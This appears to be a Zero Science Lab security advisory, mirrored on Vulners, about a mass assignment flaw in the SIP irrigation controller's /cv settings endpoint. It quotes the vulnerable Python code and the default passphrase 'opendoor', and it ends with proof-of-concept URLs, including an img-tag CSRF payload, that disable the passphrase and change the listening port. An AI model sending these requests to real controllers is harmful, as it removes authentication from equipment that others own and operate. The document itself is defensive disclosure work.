Lucene search
K

SIP Sustainable Irrigation Platform 5.x (cv) Settings Mass Assignment

🗓️ 14 Jul 2026 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 8 Views

SIP irrigation platform allows web parameter updates, enabling passphrase and port changes.

Code
<html><body><p>SIP Sustainable Irrigation Platform 5.x (cv) Settings Mass Assignment


Vendor: Dan-in-CA
Product web page: https://github.com/Dan-in-CA/SIP
Affected version: 5.2.16

Summary: SIP is a free Raspberry Pi based Python program for
controlling irrigation systems (sprinkler, drip, hydroponic,
etc). It uses web technology to provide an intuitive user
interface (UI) in several languages. The UI can be accessed
in your favorite browser on desktop, laptop, and mobile devices.
SIP has also been used to control pumps, lights, and other Irrigation
related equipment.

Desc: The application's value-setting interface copies every
parameter received in an HTTP request directly into its internal
settings object without restricting which settings may be changed.
This can be exploited to modify arbitrary configuration values
that the endpoint was never intended to expose, including disabling
the passphrase or changing the listening port, by supplying the
corresponding parameter names. When the optional passphrase is
not enabled (factory default) this requires no authentication,
and where the passphrase is enabled it defaults to 'opendoor' and
the same result is reachable through cross-site request forgery.

====================================================================
/home/pi/SIP/webpages.py:
-------------------------

119: class change_values(ProtectedPage):
120:     """Save controller values, return browser to home page."""
121:
122:     def GET(self):
123:         self.change_values()
124:
125:     def change_values(self):    
126:         qdict = web.input()
127:         if "rsn" in qdict and qdict["rsn"] == "1":
128:             pid = gv.pon - 1           
129:             stop_stations()
130:             if pid &lt; 97:
131:                 gv.phold[0] = pid
132:                 gv.phold[1] = gv.lm + (gv.pd[pid]["start_min"] * 60) + total_duration(gv.pd[pid])         
133:             raise web.seeother("/")
134:         elif "en" in qdict and qdict["en"] == "0":
135:             gv.srvals = [0] * (gv.sd["nst"])  # turn off all stations
136:             set_output()
137:         if "mm" in qdict and qdict["mm"] == "0":
138:             clear_mm()            
139:         if "rd" in qdict:        
140:             if qdict["rd"]:
141:                 gv.sd["rd"] = int(float(qdict["rd"]))
142:                 gv.sd["rdst"] = round(gv.now + gv.sd["rd"] * 3600)
143:                 stop_onrain()
144:                 report_rain_delay_change()
145:             else:
146:                 gv.sd["rd"] = 0
147:                 gv.sd["rdst"] = 0
148:                 report_rain_delay_change()
149:         for key in list(qdict.keys()):           &lt;-------- m  a  s  s
150:             try:
151:                 gv.sd[key] = int(qdict[key])     &lt;-------- assignment
151:             except Exception:
152:                 pass
153:         jsave(gv.sd, "sd")
154:         report_value_change()
155:         raise web.seeother("/")  # Send browser back to home page

====================================================================

Tested on: Debian GNU/Linux 11 (bullseye) raspberrypi 6.1.21+ (armv6l/aarch64)
           Python 3.9.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5997
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5997


24.06.2026

--

Disable passphrase (CSRF/XSS):
------------------------------

http://SIP/cv?upas=0
<img src="http://SIP/cv?upas=0"/>


Set keys the endpoint doesn't own:
----------------------------------

http://SIP/cv?upas=1&amp;htp=8081&amp;nbrd=3
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation